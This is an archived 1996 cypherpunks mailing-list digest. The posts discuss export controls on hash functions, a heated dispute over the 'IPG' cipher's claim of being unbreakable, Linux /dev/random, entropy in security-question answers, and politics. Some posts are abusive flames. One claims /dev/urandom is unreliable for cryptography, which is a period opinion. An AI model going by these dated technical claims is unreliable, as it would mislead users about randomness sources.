>      1. Introduction 
> 
> Section II: Technical Background
> 
>      2. An Overview of the Global Information Infrastructure 
>          or "Information Superhighway"
>      3. The World Wide Web and Electronic Commerce
>      4. Security and Encryption
>      5. Payment Mechanisms 
> 
> Section III: Tax Policy and Administration Issues
> 
>      6. Tax Policy and Administration Issues: General 
>          Considerations
>      7. Substantive Tax Law Issues
>      8. Tax Administration and Compliance Issues       
>      9. Conclusion
>      Glossary
>      Notes 
> 
> 


// declan@eff.org // I do not represent the EFF // declan@well.com //






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "P. J. Ponder" <ponder@freenet.tlh.fl.us>
Date: Fri, 22 Nov 1996 19:15:20 -0800 (PST)
To: cypherpunks@toad.com
Subject: FAQ on legalities SSLeay, &c.
Message-ID: <Pine.OSF.3.91.961122215908.26369G-100000@fn3.freenet.tlh.fl.us>
MIME-Version: 1.0
Content-Type: text/plain


the recently posted FAQ on crytpo patent expiration dates etc. stated that
MD5 and SHA were not export-restricted anywhere.  The FIPS Pub for SHA
(which I think is numbered 180-1) specifically states that SHA is export
controlled (by ITAR).  I asked this list why it would be controlled, since
it was a signature function, and Perry Metzger replied that crypto hash 
functions make good starting points for building a block cipher program.  

there is a section in Schneier's _Applied Crypto_ on this, too.

anybody heard from the old Perry-grammer on his list project?
I miss him.  He would be having a field day with all this noise.

surprised there hasn't been more chatter about the improved differential 
fault analysis (IDFA).  That is pretty powerful stuff.  They just don't 
make tamper-proof like they used to.  Forget chomping on the keyspace, 
read the modulus and divide by the public key.  I like the reference to 
the 'Mafia EFT/POS'.

ObSciFi:  Go back and read the Preface (by Bruce Sterling) to Gibson's 
_Burning Chrome_ collection.  He talks about the sorry state of SF in the 
1980's and how Gibson, among others, was turning out something new. Hmph.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sat, 23 Nov 1996 00:53:34 -0800 (PST)
To: cypherpunks@toad.com
Subject: Star Trek: First Contact
Message-ID: <199611230853.AAA10184@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


For the fans of E.E.(Doc) Smith, go see this movie.

OBCrypto: Data locks the main computer with a fractal cypher.

OBMoney: Picard states the they don't have money in the 24th century. 
Instead they work for the good of mankind.  Nanotechnology must have made
everything material possible, so the only reward left is status (aka
reputation).


-------------------------------------------------------------------------
Bill Frantz       | The lottery is a tax on    | Periwinkle -- Consulting
(408)356-8506     | those who can't do math.   | 16345 Englewood Ave.
frantz@netcom.com |       - Who 1st said this? | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wichita@cyberstation.net
Date: Sat, 23 Nov 1996 00:51:59 -0800 (PST)
To: paul@fatmans.demon.co.uk
Subject: Q.E.D |= Montgolfiering + Inbongis + Fermented Pear Juice + AGA
In-Reply-To: <848071227.510148.0@fatmans.demon.co.uk>
Message-ID: <Pine.BSI.3.95.961122235129.7786A-100000@citrine.cyberstation.net>
MIME-Version: 1.0
Content-Type: text/plain




On Thu, 14 Nov 1996 paul@fatmans.demon.co.uk wrote:

> 
> >          Since the IPG algorithm is impregnable, obviously no
> >          individual, or collection of individuals, from said
> >          Universities, the Cypherpunks, or the Coderpunks has been
> >          able to crack the system. Of course, this inability to do the
> >          impossible applies not only to the present but for all time,
> >          for all eternity."
> 
> 
> Look, 
> 
> do you seriously think that university researchers, professors and 
> data security consultants have nothing better to do with their time 
> than look at your pathetic collection of cryptographic stocking 
> fillers.
> 
Several of them are. And if I am to believe your private
postings of the past, you have tried but failed, and are thusly
understandably frustrated.  

> I thought you had finally gone away when I saw no posts from you for 
> about a week. I am depressed beyond belief to see you have returned 
> to interrupt the flow of discussion.... Leave and never return...
> 
Sorry about that old chap, but the last Englishmen that had the power
to command us here in the States was George III, and he was a mad
ignorant lunatic Englishman like you. I am not as adept at telling you off
as AGA,  but obviously you insignificant English pawns think that that
you still rule the world. In your ignorance, you are not aware but here in
the United States we have certain rights, that you parasites, not all but
those like you,  in the United Kingdom can no longer deprive us of. Try
reading Thomas Jefferson, Patrick Henry, Thomas Paine, and hundreds of
others. We are no longer yours to command, Dei Gratita.   

Break my system and I will gladly crawl back into the hole that you
somehow think I have emerged from. Until that time, which
thus obviously means forever, or at least without definable limits, you
may expect me to continue to make postings as I may see fit, or respond to
your senseless jabberwocky. You and some of the other  cypherpunks,
coderpunks are cryptographic quacks, you read Shannon and Schenier, and
hang out shingle as a cryptographic expert, when you have no knowledge of
the subject whatsoever. You need to be exposed as the quack you are. 

Of course, the real problem is that you, cannot break my system, 
you are clueless about how to do that and you know it. You
have never broken any significant crypto system and you never will because 
you do not know how. You are a great pretentious turkey, that flaps
his wings and spreads all kinds of crappy gobbledegook because that is
all they know how to do. Every forum like this has their flocks of those 
turkeys, like you, because it puffs up their hyperdeflated ego. 

As to your other postings alleging a break, you know that is not true.
You, John and Adam posted a bunch of crap. Even Perry, has given up
trying to perpetuate that factoid. Even the alleged break was not a
system break, it might have been used to break an individual messages, 
or some messages but that was not the algorithm and you know it. You are a
practioner of Gimcrackery and everyone knows it, including you. 

There are a lot of serious professional people on the Cypherpunks and
Coderpunks lists, but you are certainly not among them. With respect to
you and a few others, I might paraphrase one of your own, one who I
respect enormously as does most other Americans, that being Winston
Churchill. Paraphrasing Sir Winston, "Never have so few, said so much and 
thought they had done so much, when in fact they had said nothing and
done nothing except to splutter baneful balderdash."  

You individually, and as a member of the crytographic claque, have done
enough unwarranted inbongis to  remind me of Rousseau words:

         "The less reasonable a cult is, the more men seek to
                     establish it by force."

Or better still and more succinct, another of your own, Sir Alfred North
Whitehead, another Englishman that I admire, who said:

         "There is no greater hinderance to the progress of thought 
               than an attitude of irritated party-spirit." 
            
Read the postings made in response to my postings. From the beginning,
they have invoked an irritated party-spirit, fortunately not of the
many but only the few of the lunatic fringe of the Cypherpunks -
Coderpunks, like you. 

Another Englishmen, Alexander Pope in verse said it well too:

           "The ruling passion, be it what it will
            The ruling passion conquers reason still."

Your, and the lunatic fringe's ruling passion that you know it all, that
you are right and that makes it right is more of your Delphic
Neanderthal thinking. "Sans doubte," your need for rinforzando dictums is
obviously results from the fact that you are absolutely 
illuminiferous.  


> I truly have never hear anyone speak as much bollocks as you in my 
> entire life, even those who have studied the art for many years...
> 
I do not know what you have never hear, but I have heard and read enough
of your sententious pap to realize that you do not know what you are
writing about. Your ignorance is sublime, you are not only dumb, and
dumber, but you are obviously the dumbest of the dumb with possibly the
exception of fermented pear juice, and with the cypherpunk - coderpunk
imperium, that is saying a lot.  

Lead on McPuff(ery),

With the kindest personal regards,

Don Wood 








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wichita@cyberstation.net
Date: Sat, 23 Nov 1996 01:13:44 -0800 (PST)
To: cypherpunks@toad.com
Subject: IPG Algorith Broken!
In-Reply-To: <Pine.BSF.3.91.961115000356.12942G-100000@mcfeely.bsfs.org>
Message-ID: <Pine.BSI.3.95.961123025857.17068A-100000@citrine.cyberstation.net>
MIME-Version: 1.0
Content-Type: text/plain



Do not belive it, it will never happen. It is impossible,  and we can
prove it to your satisfaction.

Please be advised that effective immediately any U.S. or Canadian
corporation (ltd), organization or government group may now receive a free
IPG demonstration system, it has some limitations but it does  allow users
to see how easy it is to use the system compared to existing antiquated
systems. It will also allow users to prove to themselves that the security
is truly peerless.

This offer does not apply to individual users.

To obtain your organization free operational demonstration copy, please
send an e-mail request to:

        ipgsales@cyberstation.net

You must include your snail-mail address and telephone number in said
request. 

The pcopy will allow for multiple users.

With kindest regards,

Don Wood






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Wise <jim@santafe.arch.columbia.edu>
Date: Sat, 23 Nov 1996 02:09:01 -0800 (PST)
To: Jon Galt <jongalt@pinn.net>
Subject: Re: wealth and property rights
In-Reply-To: <MAPI.Id.0016.006f6e67616c74203030303730303037@MAPI.to.RFC822>
Message-ID: <Pine.NEB.3.94.961123040742.14111A-100000@localhost>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 22 Nov 1996, `Jon Galt' wrote:

> What an interesting topic for this list.  I really must point out that most
> wealth in this country is first generation wealth - in other words, most
> wealth is EARNED, not "handed down".
 
Please back this statement up.  The fact is, contrary to our grand self-image,
America has one of the lowest rates of class mobility in the world.  Just shy
of forty percent of the wealth (in land and capital) in the U.S. is possessed
by one percent of the  population.  This far outstrips, for example, 
Great Britain, where the top one percent of society holds 18% of the nation's
wealth.  Continuing down the line, the top 20% of the us population hold more
than 80% of the nation's wealth.  [Source New York Times, April 17. 1995, p.1]

_However_, that's not what I came here to talk to you about tonight:

> too much wealth in relation to those around them.  Adam Back (and
> the cypherpunks?) is (are) against people being prevented from
> accumulating "too much" wealth in relation to those around them.

An oversimplification.  Cypherpunks are in favor of people using technology
to take their own privacy into their own hands.  Anything outside the scope
of this issue is an aside.  Cypherpunks tend toward anarchism / libertarianism
as a result of their strong bent toward personal freedom, but this generalization
obscures the fact that cypherpunks is a _pragmatic_ group, addressing issues
of importance to both left-leaning and right-leaning anarchist / libertarian
types.  To split the group on lines of economic principle is to undermine the
value of this shared ground.  Let's face it -- when it comes to privacy, the
US and the world are in a state of crisis right now.  It would be a serious
mistake to let our disagreements on economic policy drive us from the fight
for liberty.

--
				Jim Wise
				System Administrator
				GSAPP, Columbia University
				jim@santafe.arch.columbia.edu
				http://www.arch.columbia.edu/~jim
				* Finger for PGP public key *





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Fri, 22 Nov 1996 21:11:12 -0800 (PST)
To: "Mark M." <markm@voicenet.com>
Subject: Re: /dev/random and similar
In-Reply-To: <Pine.LNX.3.95.961122132835.505A-100000@gak.voicenet.com>
Message-ID: <Pine.LNX.3.94.961123050656.11476B-100000@random.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Fri, 22 Nov 1996, Mark M. wrote:

> On Fri, 22 Nov 1996, Three Blind Mice wrote:
> 
> > There was a thread here a while back about /dev/random and similar devices
> > for Linux, but I managed to lose the mails and the hks.net archives still
> > aren't working (any news on that?).  If someone could tell me where I
> > could find such a driver, I would appreciate it very much.      TIA!
> 
> It's part of the kernel (as of 2.0).  All you have to do is create the devices
> /dev/random and /dev/urandom with major number 1 and minor numbers 8 and 9
> respectively.
> 
> Mark

It should be noted, however, that only /dev/random is cryptographically
pseudorandom. (or rather, can be safely treated as such).  /dev/urandom
cuts some strings to be faster, but is less reliable.

 --Deviant
   PGP KeyID = E820F015 Fingerprint = 3D6AAB628E3DFAA9 F7D35736ABC56D39

They seem to have learned the habit of cowering before authority even when
not actually threatened.  How very nice for authority.  I decided not to
learn this particular lesson.
                -- Richard Stallman


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMpaG9jCdEh3oIPAVAQFuLgf+Jv+p8e4pYsSW9e17aOJhly2343Xo4KdM
SWZzaZRAz2/4Q1T2kKR0VGA5g8NveXw0TotMYadFFB/V6W1ibqcYRmetIvJQbfED
9oGz5SEdTNGrTFEGWlRHYBcEw1bqLEPQ4b2Wov8tdwwQAuHcQic4q3HGIN1xjV+z
3SdLJWxfOWYXxQvrXGtaXEr5mAM8ZxtnpWt0WJuSxlFxDTS2xmOjAx+jr+KnJiih
7pf9Z/Gy4mA6h4u191iDIhP0BQG+84p50y+9Im4kPd0BMFk1+/XUfcyNBV0WL7H/
Odqe4QblkWaJnAL6H4TetLbeaF79hjspJcVNtcy03a+7lsfACPAGjg==
=zl6V
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 23 Nov 1996 02:49:15 -0800 (PST)
To: wichita@cyberstation.net
Subject: Re: Q.E.D |= Montgolfiering + Inbongis + Fermented Pear Juice + AGA
In-Reply-To: <Pine.BSI.3.95.961122235129.7786A-100000@citrine.cyberstation.net>
Message-ID: <Pine.SUN.3.94.961123054542.12685C-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 23 Nov 1996 wichita@cyberstation.net wrote:

> On Thu, 14 Nov 1996 paul@fatmans.demon.co.uk wrote:

> > Look, 

[...]

> > I thought you had finally gone away when I saw no posts from you for 
> > about a week. I am depressed beyond belief to see you have returned 
> > to interrupt the flow of discussion.... Leave and never return...
> > 
> Sorry about that old chap, but the last Englishmen that had the power
> to command us here in the States was George III,

And if you are any indication, it's been downhill ever since he failed.

Vote Monarchist.

> With the kindest personal regards,

Eat lint.

--
Forward complaints to : European Association of Envelope Manufactures
Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
Vote Monarchist         Switzerland





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 23 Nov 1996 02:59:53 -0800 (PST)
To: wichita@cyberstation.net
Subject: Re: IPG Algorith Broken!
In-Reply-To: <Pine.BSI.3.95.961123025857.17068A-100000@citrine.cyberstation.net>
Message-ID: <Pine.SUN.3.94.961123055820.12685D-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 23 Nov 1996 wichita@cyberstation.net wrote:

> To obtain your organization free operational demonstration copy, please
> send an e-mail request to:
> 
>         ipgsales@cyberstation.net
> 
> You must include your snail-mail address and telephone number in said
> request. 

Now THIS has potential!

--
Forward complaints to : European Association of Envelope Manufactures
Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
Vote Monarchist         Switzerland





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 23 Nov 1996 03:03:53 -0800 (PST)
To: Bill Frantz <frantz@netcom.com>
Subject: Re: Star Trek: First Contact
In-Reply-To: <199611230853.AAA10184@netcom6.netcom.com>
Message-ID: <Pine.SUN.3.94.961123060232.12685E-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 23 Nov 1996, Bill Frantz wrote:

> Date: Sat, 23 Nov 1996 00:57:06 -0800
> From: Bill Frantz <frantz@netcom.com>
> To: cypherpunks@toad.com
> Subject: Star Trek: First Contact
> 
> For the fans of E.E.(Doc) Smith, go see this movie.
> 
> OBCrypto: Data locks the main computer with a fractal cypher.
> 
> OBMoney: Picard states the they don't have money in the 24th century. 
> Instead they work for the good of mankind.  Nanotechnology must have made
> everything material possible, so the only reward left is status (aka
> reputation).

Why doesn't everyone have a starship?

> 
> 
> -------------------------------------------------------------------------
> Bill Frantz       | The lottery is a tax on    | Periwinkle -- Consulting
> (408)356-8506     | those who can't do math.   | 16345 Englewood Ave.
> frantz@netcom.com |       - Who 1st said this? | Los Gatos, CA 95032, USA
> 
> 
> 

--
Forward complaints to : European Association of Envelope Manufactures
Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
Vote Monarchist         Switzerland





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Sat, 23 Nov 1996 09:50:50 -0800 (PST)
To: wichita@cyberstation.net
Subject: Re: IPG Algorith Broken!
In-Reply-To: <Pine.BSI.3.95.961123025857.17068A-100000@citrine.cyberstation.net>
Message-ID: <199611231609.IAA32322@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain


wichita@cyberstation.net writes:
> 
> 
> Do not belive it, it will never happen. It is impossible,  and we can
> prove it to your satisfaction.

No, you can't.  It's impossible to prove an algorithim unbreakable.
You can only say that it hasn't been broken yet, but you can't
predict the advances in cryptoanalysis.

If, in two or three years, no one's broken it then maybe it'll seem
like a reasonably-secure algorithim.  Of course when someone does break
it you'll just say "oh, that wasn't the real algorithim" like you did
last time. 

> Please be advised that effective immediately any U.S. or Canadian
> corporation (ltd), organization or government group may now receive a free
> IPG demonstration system, it has some limitations but it does  allow users
> to see how easy it is to use the system compared to existing antiquated
> systems. It will also allow users to prove to themselves that the security
> is truly peerless.
> 
> This offer does not apply to individual users.

Why not?  Not giving it to individuals will keep a number of people
from examining it.  If it's as secure as you say then you wouldn't
care who or how many people look at it, would you?
You could always make the demo time-limited.


-- 
Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sat, 23 Nov 1996 09:54:27 -0800 (PST)
To: Cypherpunks <cypherpunks@toad.com>
Subject: A.Word.A.Day--syncope (fwd)
Message-ID: <Pine.SUN.3.91.961123094720.6554A-100000@crl7.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

For those of you who don't get Word.A.Day, you might enjoy the
unatributed quote at the bottom of the post.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
---------- Forwarded message ----------
Date: Sat, 23 Nov 1996 01:52:20 -0500
From: Wordsmith <wsmith@wordsmith.org>
To: linguaphile@wordsmith.org
Subject: A.Word.A.Day--syncope

syn.co.pe \'sin-k*-(.)pe-, 'sin-\ n [LL, fr Gk synkope-, lit., cutting 
   short, fr. synkoptein to cut]short, fr. syn- + koptein to cut - more at 
   CAPON 1: a partial or complete temporary suspension of respiration and 
   circulation due to cerebral ischemia : FAINT 2: the loss of one or more 
   sounds or letters in the interior of a word (as in fo'c'sle for forecastle)

 
 
...........................................................................

The generation of random numbers is too important to be left to chance.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
 
To subscribe or unsubscribe, please send a message to wsmith@wordsmith.org
with "Subject:" line as "subscribe <Your Real Name>" or "unsubscribe".
Email anu@wordsmith.org if you have any questions, comments or suggestions.
Archives, FAQ, words and more at the WWW site: http://www.wordsmith.org/awad/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Ray <jmr@shopmiami.com>
Date: Sat, 23 Nov 1996 07:01:28 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: IPG Algorith Broken!
Message-ID: <199611231501.KAA17614@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: cypherpunks@toad.com
Date: Sun Nov 24 09:59:36 1996
Uni wrote:

> On Sat, 23 Nov 1996 wichita@cyberstation.net wrote:
> 
> > To obtain your organization free operational demonstration copy,
>  please
> > send an e-mail request to:
> > 
> >         ipgsales@cyberstation.net
> > 
> > You must include your snail-mail address and telephone number in said
> > request. 
> 
> Now THIS has potential!

Indeed. Note that he calls it "organization free" above. Obviously, his 
operation's entire marketing department is an excellent source of 
randomness.:)
JMR


Regards, Jim Ray
DNRC Minister of Encryption Advocacy

One of the "legitimate concerns of law enforcement" seems to be
that I was born innocent until proven guilty and not the other
way around. -- me

Please note new 2000bit PGPkey & address <jmr@shopmiami.com>
PGP id.A7D63DA9 98 1F 39 BA 93 86 B4 F5  57 52 64 0E DA BA 2C 71


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEPAwUBMphi3DUhsGSn1j2pAQHJ0gfQzgWGEb2lJ3KSPWGn3td/k2veuxZDjkHu
OlITK3W6zT9MUWqh4KrdvQkt7Z/RzRls+uJPr7ZChS8f6FSHHvGWSmnTBZb+Bav8
JGJqcq+b/BwuUJ0RmVbGL9N7BCCXICroIdGQc1R+DmUuTMcqaAxD9bYWYbs/JSr0
Q00u3L/w8djc74sR2dS3PWmwF9PGLlmKrVQijY/q7WUNhKJDoZR4w511hswVHn1N
BMjR49s+5Gh3N6eaRnKx/B2GnByhvL5Sgai2uPAqT5tFiA7R1nxnHZIlgMplYKsw
27nUWGYFpM+gP/wppw1neZqJcu4xKzg25IN4QIe86T78oA==
=WUGy
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Sat, 23 Nov 1996 07:46:03 -0800 (PST)
To: unicorn@schloss.li (Black Unicorn)
Subject: Re: Star Trek: First Contact
In-Reply-To: <Pine.SUN.3.94.961123060232.12685E-100000@polaris>
Message-ID: <199611231541.KAA13180@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain


Black Unicorn wrote:
| On Sat, 23 Nov 1996, Bill Frantz wrote:
| > For the fans of E.E.(Doc) Smith, go see this movie.
| > 
| > OBCrypto: Data locks the main computer with a fractal cypher.
| > 
| > OBMoney: Picard states the they don't have money in the 24th century. 
| > Instead they work for the good of mankind.  Nanotechnology must have made
| > everything material possible, so the only reward left is status (aka
| > reputation).
| 
| Why doesn't everyone have a starship?

	Becuase they've created an insidious welfare state so that no
one wants for basic human needs.  This has sapped the drive of most
people so far that only war generates new technology. Said new
technology is too expensive to give to the common man, who should be
satisfied watching Patrick Stewart, history's greatest Shakesperian
actor.

;)

Adam



-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@cypherpunks.ca (John Anonymous MacDonald)
Date: Sat, 23 Nov 1996 11:20:16 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: IPG Algorith Broken!
Message-ID: <199611231914.LAA10101@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain



At 8:09 AM 11/23/1996, Eric Murray wrote:
>No, you can't.  It's impossible to prove an algorithim unbreakable.

No?  Please prove your assertion.

Your claim is similar to IPG's - nobody has done it yet.

Your claim is stronger - hardly anybody has worked on IPG's algorithm,
nor are they likely to.

diGriz






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sat, 23 Nov 1996 09:50:50 -0800 (PST)
To: Lucky Green <trei@process.com>
Subject: RE: Mass-market crypto phones
Message-ID: <3.0b36.32.19961123113329.0074e444@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:40 AM 11/22/96 -0800, Lucky Green wrote:
>The LEA's are not intested in saving the public money. They are 
>interested in preserving and expanding their power. If it costs 
>$1,000,000 per wiretap, who cares? The government has men with guns that 
>can always go out and extort more cash from the population.
>
>--Lucky

They could if they would; but they can't so they won't.  Governments (like
real people) always collect as much revenue as they possibly can at a given
time.  If they could figure out a way to get more they would.  To argue
otherwise is to imply that they are not maximizing their total monetary and
psychic income and are forebearing to grab all they could.  I don't think
members of this list should pay The Great Enemy such a compliment.

Remember the findings of the Public Choice school.

DCF  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@USIT.NET>
Date: Sat, 23 Nov 1996 09:13:32 -0800 (PST)
To: cypherpunks@toad.com
Subject: (fwd) HOLLAND URGENT! HELP NEEDED! (fwd)
Message-ID: <Pine.GSO.3.95.961123121025.29417B-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain


I don't know anything about the particulars of this plea, but I thought it
nicely illustrated the potential dangers of a national ID card such as we
will soon have.

bd

---------- Forwarded message ----------
#From: "Hillel Barak" <freedom@netvision.net.il>
#Newsgroups: misc.activism.progressive
#Subject: HOLLAND URGENT! HELP NEEDED!
#Date: 22 Nov 1996 20:00:43 GMT

------- Forwarded Message Follows -------

Hier in Holland, we have been in the past few years regularly
confrontated with the problem of Palestinians whose requests for a stay
permit in Holland have been rejected and who have been ordered to leave
the country, although they cannot go back anywhere. It concerns refugees
who are excluded by the "Oslo Agreements", who fled or were expelled from
the countries where they resided and who do not have a nationality or any
valid papers. We have, for instance, people who used to work for the PLO in
Tunis and who had a stay permit there only as employees of the PLO, but
who cannot go back since they don't work for the PLO anymore, or people
who have been expelled from Kuwait after the Gulf War. It appears that
those people's requests for refugee status or stay permit are always
rejected, after which they get an expulsion order. In some cases, they
are put by the police on a flight to Tunis or elsewhere. When they arrive
at the airport there, they are put on the next flight back to Amsterdam.
Then the police here put them in the street, without any paper. They are
supposed to be "expelled", so that they do not exist in Holland. First
they have to find people who can house them. Then, as they have no
papers, not even an identity card, they cannot work, have no right to
medical help, cannot send their children to school, etc... and totally
depend on the charity of the people who house them and are moreover
threatened to be arrested for having no papers each time they have to go
out (as the police who put them in the street does not even give them a
paper explaining why they have no papers: the policy is clearly to insure
that they have such a bad time in Holland that they will in the end seek
refuge elsewhere).

Some people here, who are actively involved in helping refugees, want to
put a complaint to the European Court of Justice and the Council of Europe.
To do so, we need as much legal information as possible on the "legal"
status of those Palestinians refugees who fall out from the "Oslo
Agreements" and do not have any nationality or resident status anywhere.
So please send me as soon as possible any information, legal texts,
etc... about the official status of Palestinian refugees from Tunisia,
Lebanon, Jordan, Syria, Kuwait, Libya or any other country were they might
have lived. I request those of you who are lawyers to ask their
colleagues who are specialized in international law to give legal
information and their advice about the problem. Our point is to show the
European instances that those Palestinians who have been expelled from
the Arab countries where they once resided have legally nowhere to go
and that it is preposterous to deny their existence and give them the
status of "expelled persons" to countries they cannot enter.

I thank you all very much in advance,

Christine Prat

*****************************************************************************
Christine Prat
POB 16545,  1001 RA  Amsterdam
E-mail: Christine.Prat@let.uva.nl                     University of Amsterdam
*****************************************************************************







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pat Farrell <pfarrell@netcom.com>
Date: Sat, 23 Nov 1996 09:14:16 -0800 (PST)
To: cypherpunks@toad.com
Subject: how much entropy in common answers
Message-ID: <199611231714.JAA21617@netcom5.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I've been playing arround with some code to implement CME's 
secret sharing using low entropy answers. (His write-up
is in http://www.clark.net/pub/cme/html/rump96.html)

In the write-up, Carl says " That means that it has very low entropy. For example, a person's first name has only about 8 bits of entropy. Car makes and models have only 2 to 4 bits of entropy -- especially if one is naming cars desirable to a teenager."

Further on, he says "Therefore, if each answer has entropy E, the attacker must correctly guess T=(EK) bits of answers. If T exceeds 90 bits or so, then the user is reasonably secure from answer-guessing attacks." (where K is the number
of questions)

My question is, how do we measure the entropy of each answer so we can
calculate when we've got 90 or so bits.  I know when I was a teenager,
the list of car lust objects was short, and everyone wanted a Mustang or
Camaro, so the entropy of those two choices was much less than half a bit.

A similar idea was mentioned in a critique of the plot of West Side Story.
The question is, on a hot night in Spanish Harlem, what percentage of
women are named "Maria"?

Clearly there are cultural issues involved. The entropy in a question
such as "what is your favorite brother's name?" is low in an Irish
family like mine where names cluster arround choices such as are Patrick,
John, Sean, and Dan.

So how do we measure the entropy objectively?

Thanks
Pat



Pat Farrell    CyberCash, Inc. 			(703) 715-7834
pfarrell@cybercash.com
#include standard.disclaimer




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@sendai.scytale.com (Roy M. Silvernail)
Date: Sat, 23 Nov 1996 10:59:20 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: IPG Algorith Broken!
In-Reply-To: <Pine.BSI.3.95.961123025857.17068A-100000@citrine.cyberstation.net>
Message-ID: <961123.121809.1L0.rnr.w165w@sendai.scytale.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, wichita@cyberstation.net writes:

> Do not belive it, it will never happen. It is impossible,  and we can
> prove it to your satisfaction.

Formally?

*PLONK*
- -- 
           Roy M. Silvernail     [ ]      roy@scytale.com
"There are two major products that came out of Berkeley:
LSD and UNIX.  This is no coincidence."
            -- glen.turner@itd.adelaide.edu.au (Glen Turner)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMpdAFxvikii9febJAQH8mAP/dt4GWcbuQL4tuEDNUJUQhqmbGHrcTUiD
zxZrCyxrJyi+z5IGLkfAGGOlAq7Ls5F9/EnN3cvm17AIOEWwPkgBIFx/y4BHrsNJ
oPkthtjx6xNfqq3P6033j+Un8g2EG0kxaSQWh5w5ZI2PXLNJTWszDmhk8dcYxgEW
UP/oDZrb0F8=
=lxMC
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Sat, 23 Nov 1996 12:34:08 -0800 (PST)
To: nobody@cypherpunks.ca (John Anonymous MacDonald)
Subject: Re: IPG Algorith Broken!
In-Reply-To: <199611231914.LAA10101@abraham.cs.berkeley.edu>
Message-ID: <199611232033.MAA01386@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain


John Anonymous MacDonald writes:
> 
> 
> At 8:09 AM 11/23/1996, Eric Murray wrote:
> >No, you can't.  It's impossible to prove an algorithim unbreakable.
> 
> No?  Please prove your assertion.

You can't prove a negative.  The best IPG could say is that
it can't be broken with current technology.
Next week someone might come up with a new way
to break ciphers that renders the IPG algorithim breakable.

You point could have been that the same problem exists
for proofs- that next week someone could come up
with a way to prove, for all time, that an algorithim
really IS unbreakable.  So, to cover that posibility
I should have said "it's currently impossible to
prove an algorithim unbreakable". :-)

 

-- 
Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF




